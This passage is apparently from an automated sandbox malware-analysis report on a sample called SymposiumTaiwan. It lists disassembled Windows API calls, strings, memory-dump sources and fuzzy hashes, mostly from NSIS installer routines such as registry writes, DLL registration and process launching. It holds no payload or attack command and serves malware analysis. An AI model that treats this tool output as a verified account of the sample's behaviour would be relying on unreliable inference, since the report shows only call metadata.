                                              • wsprintfA.USER32 ref: 00406B79
                                              • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                              • API String ID: 565278875-3368763019
                                              • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                              • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                              • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                              • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                              • DeleteObject.GDI32(?), ref: 004010F6
                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                              • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                              • DeleteObject.GDI32(?), ref: 0040116E
                                              • EndPaint.USER32(?,?), ref: 00401177
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                              • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                              • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                              • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                              APIs
                                              • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406902
                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                              • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406A73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                              • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 3581403547-1792361021
                                              • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                              • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                              • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                              • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                              • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                              Strings
                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                              • API String ID: 1641139501-220328614
                                              • Opcode ID: d28433864b4d3a2481731081a8cbeb7a0f2bcceb6c22eb94dadda467bc783426
                                              • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                              • Opcode Fuzzy Hash: d28433864b4d3a2481731081a8cbeb7a0f2bcceb6c22eb94dadda467bc783426
                                              • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                              APIs
                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                              • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678), ref: 004061C7
                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                              • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                              • API String ID: 3734993849-3206598305
                                              • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                              • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                              • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                              • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                              Strings
                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                              • String ID: created uninstaller: %d, "%s"
                                              • API String ID: 3294113728-3145124454
                                              • Opcode ID: 75e8dd1e889fc21f11d688468e3db6e7567b4992a32c7386c263c217e3cb8233
                                              • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                              • Opcode Fuzzy Hash: 75e8dd1e889fc21f11d688468e3db6e7567b4992a32c7386c263c217e3cb8233
                                              • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042634C,762323A0,00000000), ref: 00404FD6
                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042634C,762323A0,00000000), ref: 00404FE6
                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                              Strings
                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                              • `G, xrefs: 0040246E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                              • API String ID: 1033533793-4193110038
                                              • Opcode ID: c076069b8b51cc5180cfdda9fa0df6bded6a99c0ce616e210176aacc9454d606
                                              • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                              • Opcode Fuzzy Hash: c076069b8b51cc5180cfdda9fa0df6bded6a99c0ce616e210176aacc9454d606
                                              • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                              • GetSysColor.USER32(00000000), ref: 00403E2C
                                              • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                              • SetBkMode.GDI32(?,?), ref: 00403E44
                                              • GetSysColor.USER32(?), ref: 00403E57
                                              • SetBkColor.GDI32(?,?), ref: 00403E67
                                              • DeleteObject.GDI32(?), ref: 00403E81
                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                              • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                              • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                              • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                              APIs
                                              • lstrlenW.KERNEL32(00445D80,0042634C,762323A0,00000000), ref: 00404FD6
                                              • lstrlenW.KERNEL32(004034E5,00445D80,0042634C,762323A0,00000000), ref: 00404FE6
                                              • lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                              • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042634C,762323A0,00000000), ref: 00406902
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                              • String ID:
                                              • API String ID: 2740478559-0
                                              • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                              • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                              • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                              • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                              APIs
                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042634C,762323A0,00000000), ref: 00404FD6
                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042634C,762323A0,00000000), ref: 00404FE6
                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                              Strings
                                              • Exec: command="%s", xrefs: 00402241
                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                              • Exec: success ("%s"), xrefs: 00402263
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                              • API String ID: 2014279497-3433828417
                                              • Opcode ID: b07d39edd45b6d2841688a986433f0381924528bdc22dd5a03576e07f79a18b6
                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                              • Opcode Fuzzy Hash: b07d39edd45b6d2841688a986433f0381924528bdc22dd5a03576e07f79a18b6
                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                              • GetMessagePos.USER32 ref: 0040489D
                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                              • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                              • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                              • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                              • MulDiv.KERNEL32(0000D400,00000064,3559C050), ref: 00403295
                                              • wsprintfW.USER32 ref: 004032A5
                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                              Strings
                                              • verifying installer: %d%%, xrefs: 0040329F
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
